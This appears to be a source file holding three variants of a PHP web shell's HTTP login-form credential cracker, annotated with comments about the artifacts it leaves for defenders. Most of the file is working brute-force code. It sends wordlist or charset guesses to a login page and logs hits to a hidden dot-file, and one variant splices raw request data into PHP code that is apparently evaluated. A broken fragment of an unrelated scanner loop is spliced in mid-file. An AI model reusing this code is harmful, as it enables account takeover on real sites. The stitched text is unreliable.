/**
 * Dictionary-driven HTTP login-form credential guessing routine from a PHP
 * web shell. Every parameter comes from $_REQUEST, so the whole run is
 * attacker-controlled; the function returns nothing and writes HTML
 * fragments straight to the response.
 *
 * Defender-relevant facts visible in this variant:
 *  - Host artifact: when the "loG" checkbox is set, the file at the path in
 *    $_REQUEST['logfilE'] receives one "U: ... P: ..." line per hit. The form
 *    pre-fills that path with whereistmP() . DIRECTORY_SEPARATOR . ".log",
 *    i.e. a dot-file under whatever whereistmP() returns (presumably a temp
 *    directory, judging by its name -- confirm in its definition).
 *  - Network artifact: one request per dictionary line, with the credentials
 *    carried in the query string "?{userf}={user}&{passf}={pass}&{submitf}={submitv}".
 *    $url is appended to (".=") rather than reset inside the loop, so each
 *    successive request also carries every previous query string.
 *  - The dictionary is a server-side path ($_REQUEST['dictionary']), so a
 *    wordlist has to already exist on the host running this shell.
 *  - A falsy result from check_urL() is what counts as a hit; check_urL()'s
 *    contract is not visible here.
 *
 * Globals: $errorbox, $et, $footer are HTML fragments used on the error path;
 * $hcwd is markup inserted into the form. Relies on check_urL(),
 * file_add_contentS() and whereistmP(), all defined elsewhere.
 */
function formcrackeR()
{
    global $errorbox, $footer, $et, $hcwd;
    // The "start" submit button distinguishes a run from a form render.
    if (!empty($_REQUEST['start'])) {
        // Logging only when both the checkbox and a non-empty path are present.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $url = $_REQUEST['target'];       // action page to request
        $uf = $_REQUEST['userf'];         // username field name
        $pf = $_REQUEST['passf'];         // password field name
        $sf = $_REQUEST['submitf'];       // submit button name
        $sv = $_REQUEST['submitv'];       // submit button value
        $method = $_REQUEST['method'];    // 'POST' or 'GET' per the form's <select>
        $fail = $_REQUEST['fail'];        // "Fail string" expected in a rejected login
        $dic = $_REQUEST['dictionary'];   // server-side path of the wordlist
        $type = $_REQUEST['combo'];       // 0: password-only lines, 1: "user:pass" lines
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        // Only existence is checked; fopen() below is not checked for failure.
        if (!file_exists($dic)) {
            die("{$errorbox} Can not open dictionary.{$et}{$footer}");
        }
        $dictionary = fopen($dic, 'r');
        // Opens a <font> element that the "Done!" line below closes.
        echo '<font color=blue>Cracking started...<br>';
        while (!feof($dictionary)) {
            if ($type) {
                // Combo mode: split "user:pass" at the first colon.
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                $pass = trim(fgets($dictionary), " \n\r");
            }
            // ".=" -- the query string accumulates across iterations.
            $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
            // The literal 12 is presumably a timeout: another check_urL() call on
            // this page passes $timeout in the same position -- confirm.
            $res = check_urL($url, $method, $fail, 12);
            if (!$res) {
                echo "<font color=blue>U: {$user} P: {$pass}</font><br>";
                if ($log) {
                    file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                }
                // Password-only mode stops at the first hit; combo mode keeps going.
                if (!$type) {
                    break;
                }
            }
        }
        fclose($dictionary);
        echo 'Done!</font><br>';
    } else {
        // Form render. The target defaults to this host's own /login.php and the
        // log path to a ".log" dot-file via whereistmP(). The markup opens a
        // <table> that is never closed.
        echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://" . getenv('HTTP_HOST') . 
"/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> <input class=buttons type=submit name=start value=Start></form>{$et}</center>";
    }
}
/**
 * Second variant of the web-shell login-form guesser, with a "mode" selector.
 * mode 'wl' replays a server-side wordlist; any other value delegates to
 * brute() (not defined here) with the mode string, min/max lengths, and a
 * string of PHP source that brute() is presumably expected to evaluate.
 *
 * Defender-relevant facts visible here:
 *  - Non-wordlist branch: $_REQUEST values (target, userf, user, passf,
 *    submitf, submitv, method, fail) are spliced verbatim into the PHP source
 *    string $code, which references a $word variable it does not define and is
 *    handed to brute(). If brute() evaluates it, this is an eval-style code
 *    sink fed directly by request data.
 *  - Host artifact: hits are echoed and, when "loG" is checked, appended to the
 *    file at $_REQUEST['logfilE'] (form default:
 *    whereistmP() . DIRECTORY_SEPARATOR . '.log').
 *  - Network artifact: wordlist requests carry the credentials in the query
 *    string; $url is rebuilt from $_REQUEST['target'] on every iteration.
 *  - $dic is assigned only when $_REQUEST['dictionary'] is non-empty, so 'wl'
 *    mode with an empty dictionary field reaches fopen() with $dic undefined.
 *
 * Global: $hcwd is markup inserted into the form. Relies on check_urL(),
 * file_add_contentS(), flush_buffers(), brute() and whereistmP(), all defined
 * elsewhere. Emits HTML directly; returns nothing.
 */
function formcrackeR()
{
    global $hcwd;
    // The "start" submit button distinguishes a run from a form render.
    if (!empty($_REQUEST['start'])) {
        // Logging only when both the checkbox and a non-empty path are present.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $uf = $_REQUEST['userf'];         // username field name
        $pf = $_REQUEST['passf'];         // password field name
        $sf = $_REQUEST['submitf'];       // submit button name
        $sv = $_REQUEST['submitv'];       // submit button value
        $method = $_REQUEST['method'];    // 'POST' or 'GET' per the form's <select>
        $fail = $_REQUEST['fail'];        // "Fail string" expected in a rejected login
        // Left undefined when the field is empty (see fopen() below).
        if (!empty($_REQUEST['dictionary'])) {
            $dic = $_REQUEST['dictionary'];
        }
        $type = $_REQUEST['combo'];       // 0: password-only lines, 1: "user:pass" lines
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        // Loose comparison; any mode other than 'wl' goes to brute().
        if ($_REQUEST['mode'] == 'wl') {
            $dictionary = fopen($dic, 'r');
            if ($dictionary) {
                // Opens a <font> element that the "Done!" line below closes.
                echo '<font color=#FA0>Cracking...<br>';
                while (!feof($dictionary)) {
                    // Rebuilt every iteration, so each request has one query string.
                    $url = $_REQUEST['target'];
                    if ($type) {
                        // Combo mode: split "user:pass" at the first colon.
                        $combo = trim(fgets($dictionary), " \n\r");
                        $user = substr($combo, 0, strpos($combo, ':'));
                        $pass = substr($combo, strpos($combo, ':') + 1);
                    } else {
                        $pass = trim(fgets($dictionary), " \n\r");
                    }
                    $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
                    // A falsy result from check_urL() counts as a hit; its contract
                    // and the meaning of the literal 12 (presumably a timeout) are
                    // not visible here.
                    $res = check_urL($url, $method, $fail, 12);
                    if (!$res) {
                        echo "<font color=#FA0>U: {$user} P: {$pass}</font><br>";
                        if ($log) {
                            file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                        }
                        // Password-only mode stops at the first hit; combo mode keeps going.
                        if (!$type) {
                            break;
                        }
                    }
                }
                fclose($dictionary);
            } else {
                echo "Can not open dictionary.";
            }
        } else {
            // PHP source assembled from raw request values; $word is left for
            // brute() to supply, which implies the string is evaluated there.
            // Nothing is escaped or quoted-safe, so any value containing a
            // double quote alters the generated code.
            $code = '$test=!check_urL("' . $_REQUEST['target'] . '?' . $uf . '=' . $user . '&' . $pf . '=$word&' . $sf . '=' . $sv . '","' . $method . '","' . $fail . '",12);';
            // Errors from flush_buffers() are suppressed with "@".
            @flush_buffers();
            // brute() returns a truthy value (printed as the password) on success.
            if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code)) {
                echo "<b>{$user}:{$res}</b><br />";
                if ($log) {
                    file_add_contentS($file, "U: {$user} P: {$res}\r\n");
                }
            }
        }
        // Closes the <font> opened in the wordlist branch; in the brute()
        // branch no <font> was opened, so this emits a stray closing tag.
        echo 'Done!</font><br>';
    } else {
        // Form render. Target defaults to this host's own /login.php, the log
        // path to a ".log" dot-file via whereistmP(). The trailing toggle()
        // call relies on a JavaScript function defined by the surrounding page.
        echo '<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Form cracker</label>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div>
<div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="admin" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Action:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/login.php" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="POST">POST</option><option value="GET">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username field:</label>
<div class="thefield">
<input type="text" name="userf" value="username" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password field:</label>
<div class="thefield">
<input type="text" name="passf" value="passwd" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Submit name:</label>
<div class="thefield">
<input type="text" name="submitf" value="submit" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Submit value:</label>
<div class="thefield">
<input type="text" name="submitv" value="Login" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Fail string:</label>
<div class="thefield">
<input type="text" name="fail" value="Try again" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script type="text/JavaScript">
toggle();
</script>';
    }
}
                     flusheR();
                 }
             } elseif (strstr($page, '@NUKE')) {
                 foreach ($nuke as $cg) {
                     $nukech = str_replace('@NUKE', $cg, $page);
                     $url = "http://{$ip}{$nukech}";
                     $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                     if ($res) {
                         $output = 1;
                         echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                     }
                     flusheR();
                 }
             } else {
                 $url = "http://{$ip}{$page}";
                 $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                 if ($res) {
                     $output = 1;
                     echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                 }
                 flusheR();
             }
         }
     }
 }
 if (!empty($_REQUEST['smtprelay'])) {
     if (checkthisporT($ip, 25, $timeout)) {
         $res = '';
         $res = checksmtP($ip, $timeout);
         if ($res == 1) {
             echo "{$ip}) SMTP relay found.<br>";
/**
 * Variant of the web-shell login-form guesser without the log-file option.
 * Same request loop as the first variant on this page, with flusheR()
 * (defined elsewhere; presumably an output-buffer flush so results stream
 * to the browser -- confirm) called after every attempt.
 *
 * Defender-relevant facts visible here:
 *  - No file is written by this variant; hits are only echoed.
 *  - Network artifact: one request per dictionary line with the credentials in
 *    the query string "?{userf}={user}&{passf}={pass}&{submitf}={submitv}".
 *    $url is appended to (".=") rather than reset inside the loop, so each
 *    successive request also carries every previous query string.
 *  - The dictionary is a server-side path ($_REQUEST['dictionary']).
 *  - A falsy result from check_urL() is what counts as a hit; check_urL()'s
 *    contract is not visible here.
 *
 * Globals: $errorbox, $et, $footer are HTML fragments used on the error path;
 * $hcwd is markup inserted into the form. Relies on check_urL() and flusheR(),
 * both defined elsewhere. Emits HTML directly; returns nothing.
 */
function formcrackeR()
{
    global $errorbox, $footer, $et, $hcwd;
    // The "start" submit button distinguishes a run from a form render.
    if (!empty($_REQUEST['start'])) {
        $url = $_REQUEST['target'];       // action page to request
        $uf = $_REQUEST['userf'];         // username field name
        $pf = $_REQUEST['passf'];         // password field name
        $sf = $_REQUEST['submitf'];       // submit button name
        $sv = $_REQUEST['submitv'];       // submit button value
        $method = $_REQUEST['method'];    // 'POST' or 'GET' per the form's <select>
        $fail = $_REQUEST['fail'];        // "Fail string" expected in a rejected login
        $dic = $_REQUEST['dictionary'];   // server-side path of the wordlist
        $type = $_REQUEST['combo'];       // 0: password-only lines, 1: "user:pass" lines
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
        // Only existence is checked; fopen() below is not checked for failure.
        if (!file_exists($dic)) {
            die("{$errorbox} Can not open dictionary.{$et}{$footer}");
        }
        $dictionary = fopen($dic, 'r');
        // Opens a <font> element that the "Done!" line below closes.
        echo "<font color=blue>Cracking started...<br>";
        while (!feof($dictionary)) {
            if ($type) {
                // Combo mode: split "user:pass" at the first colon.
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                $pass = trim(fgets($dictionary), " \n\r");
            }
            // ".=" -- the query string accumulates across iterations.
            $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
            // The literal 12 is presumably a timeout: another check_urL() call on
            // this page passes $timeout in the same position -- confirm.
            $res = check_urL($url, $method, $fail, 12);
            if (!$res) {
                echo "<font color=blue>U: {$user} P: {$pass}</font><br>";
                flusheR();
                // Password-only mode stops at the first hit; combo mode keeps going.
                if (!$type) {
                    break;
                }
            }
            // Flushed after every attempt, hit or not.
            flusheR();
        }
        fclose($dictionary);
        echo "Done!</font><br>";
    } else {
        // Form render; the target defaults to this host's own /login.php.
        echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . 
"/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
    }
}